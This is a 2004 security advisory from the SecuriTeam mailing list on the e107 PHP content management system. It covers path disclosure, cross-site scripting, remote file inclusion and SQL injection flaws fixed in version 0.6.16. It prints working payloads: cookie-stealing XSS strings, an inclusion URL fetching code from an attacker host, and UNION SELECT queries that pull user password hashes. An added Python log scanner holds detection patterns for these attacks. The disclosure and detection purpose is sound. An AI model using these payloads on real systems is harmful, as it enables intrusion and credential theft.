Date: 30 May 2004 19:41:56 +0200
From: SecuriTeam <[email protected]>
To: [email protected]
Subject: [UNIX] e107 Multiple Vulnerabilities (Path Disclosures, File Inclusions and SQL Injections)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
e107 Multiple Vulnerabilities (Path Disclosures, File Inclusions and SQL Injections)
------------------------------------------------------------------------
SUMMARY
" <http://e107.org/> e107 is a portal / content management system powered
by PHP and MySQL that gives you a totally dynamic and professional website
out of the box. Its simple wizard type install process will have you up
and running in 5 minutes, and best of all it's completely free."
e107 is vulnerable to multiple types of attacks including: path
disclosures, file inclusions and SQL injections.
DETAILS
Vulnerable Systems:
* e107 version 0.6.15, possibly prior
Immune Systems:
* e107 version 0.6.16
In order to be able to exploit some of these vulnerabilities, the
following conditions must be met:
* "register_globals" must be "on"
* MySQL must be version 4.x with enabled UNION functionality (although on
some occasions one can work around this.)
Full Path Disclosure
Many software developers, webmasters, admins and other IT staff
underestimate full path disclosure as a security bug. They shouldn't, as
it gives valuable information to an attacker: information that, coupled
with other information-gathering attacks, can lead to a successful
compromise of a host.
This could be one of the reasons why many systems contain partial and full
path disclosure vulnerabilities. Usually this is possible because scripts
can be executed directly by the malicious user, resulting in a PHP error,
which tends to give ample information about the system.
Examples follow:
http://localhost/e107_0615/e107_plugins/alt_news/alt_news.php
http://localhost/e107_0615/e107_plugins/backend_menu/backend_menu.php
http://localhost/e107_0615/e107_plugins/clock_menu/clock_menu.php
http://localhost/e107_0615/e107_plugins/counter_menu/counter_menu.php
http://localhost/e107_0615/e107_plugins/login_menu/login_menu.php
Cross-site Scripting
Using XSS it is possible to steal credentials and cookies, read
cross-domain forms etc. An XSS vulnerability exists in the following
locations:
* In 'clock_menu.php', the following example performs cross site
scripting:
http://localhost/e107_0615/e107_plugins/clock_menu/clock_menu.php?clock_flat=1&LAN_407=foo%22); //--%3E%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
* In the "email article to a friend" feature, an XSS vulnerability
exists if the attacker is logged off and enters script code into the input
field, like so:
foobar'><body onload=a!ert(document.cookie);>
* The same type of problem exists in the "submit news" feature:
foobar'><body onload=a!ert(document.cookie);>
* In the user settings script, an attacker who is logged on issues a POST
request such as the following, which triggers an XSS:
http://localhost/e107_0615/usersettings.php?avmsg=[xss code here]
Remote File Inclusion
If PHP is configured with "allow_url_fopen=on" and there is no firewall
which blocks outbound traffic, then an attacker can force execution of PHP
code on the target host. This can lead to shell-level server compromise
(if there are permissions to execute system commands) with "nobody" or
"apache" privileges. If that is possible, local root exploits can be
executed and the server will be completely compromised. The problem is
located in the 'secure_img_render.php' script.
Example:
http://localhost/e107_0615/e107_handlers/secure_img_render.php?p=http://attacker.com/evil.php
Note: This requires that "register globals" be ON in order to be
effective.
SQL Injection
The following locations contain SQL injection bugs:
* The 'content.php' script, which can be exploited in the following
manner:
http://localhost/e107_0615/content.php?content.99/**/UNION/**/SELECT/**/null, null, null,CONCAT(user_name,CHAR(58),user_email,CHAR(58),user_password), null, null, null, null, null, null, null, null, null/**/FROM/**/e107_user/**/WHERE/**/user_id=1/*
* Another SQL injection in the same script but done differently:
http://localhost/e107_0615/content.php?query=content_id=99%20UNION%20select%20null, CONCAT(user_name,CHAR(58),user_email,CHAR(58),user_password), null, null, null, null, null, null, null, null, null, null, null%20FROM%20e107_user%20WHERE%20user_id=1/*
* In the 'news.php' script:
http://localhost/e107_0615/news.php?list.99/**/UNION/**/SELECT/**/null, null,CONCAT(user_name,CHAR(58),user_email,CHAR(58),user_password), null, null, null, null, null, null, null, null, null/**/FROM/**/e107_user/**/WHERE/**/user_id=1/*
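As an added example (not part of the advisory or of e107), the following Python script shows how a defender could sweep web server access logs for the three request shapes described above: the /**/ and %20-spaced UNION SELECT injections against content.php and news.php, the remote URL passed in the 'p' parameter of secure_img_render.php, and the script-tag payloads in the clock_menu and usersettings XSS cases. The log format (Apache combined style), hosts, timestamps and the attacker host name are constructed for the example.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log sample modelled on the advisory's request patterns.
# Addresses, timestamps and "attacker.example" are made up for this example.
SAMPLE_LOG = """\
10.0.0.5 - - [30/May/2004:19:41:56 +0200] "GET /e107_0615/content.php?content.99/**/UNION/**/SELECT/**/null,null/**/FROM/**/e107_user/* HTTP/1.0" 200 512
10.0.0.6 - - [30/May/2004:19:42:01 +0200] "GET /e107_0615/e107_handlers/secure_img_render.php?p=http://attacker.example/evil.php HTTP/1.0" 200 77
10.0.0.7 - - [30/May/2004:19:42:10 +0200] "GET /e107_0615/news.php?list.99%20UNION%20select%20null%20FROM%20e107_user/* HTTP/1.0" 200 800
10.0.0.8 - - [30/May/2004:19:43:00 +0200] "GET /e107_0615/e107_plugins/clock_menu/clock_menu.php?clock_flat=1&LAN_407=foo%22);%3C/script%3E%3Cscript%3E HTTP/1.0" 200 300
10.0.0.9 - - [30/May/2004:19:44:00 +0200] "GET /e107_0615/news.php?list.1 HTTP/1.0" 200 4000
"""

# Signatures for the three bug classes in the advisory, applied to the
# decoded query string rather than the raw one.
RULES = {
    "sqli_union": re.compile(r"\bunion\b.{0,40}\bselect\b", re.I),
    "rfi_remote_param": re.compile(r"[?&]\w+=(?:https?|ftp)://", re.I),
    "xss_script_tag": re.compile(r"<\s*/?\s*script\b|onload\s*=", re.I),
}

# client, timestamp, method, request target, status
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\w+) (\S+) [^"]*" (\d{3})')


def normalize(target):
    """Percent-decode twice (defeats double encoding) and replace the
    /**/ comments that MySQL accepts as whitespace with a real space."""
    t = unquote_plus(unquote_plus(target))
    return re.sub(r"/\*.*?\*/", " ", t)


def classify(line):
    """Return the parsed request with the list of matching rule names,
    or None if the line is not a well-formed access-log entry."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    ip, ts, method, target, status = m.groups()
    decoded = normalize(target)
    hits = [name for name, rx in RULES.items() if rx.search(decoded)]
    return {"ip": ip, "time": ts, "target": target,
            "status": int(status), "hits": hits}


def scan(log_text):
    """Return only the entries that triggered at least one rule."""
    results = (classify(line) for line in log_text.splitlines())
    return [r for r in results if r and r["hits"]]


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f["ip"], f["hits"], f["target"][:60])
```

A 200 status on the content.php or news.php hits is the detail worth alerting on, since a successful UNION injection returns a normal page rather than an error.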
Patch Availability:
The above-mentioned problems have been fixed in version 0.6.16. All users
of the system are highly encouraged to upgrade their version.
ADDITIONAL INFORMATION
The information has been provided by <mailto:[email protected]> Janek Vind.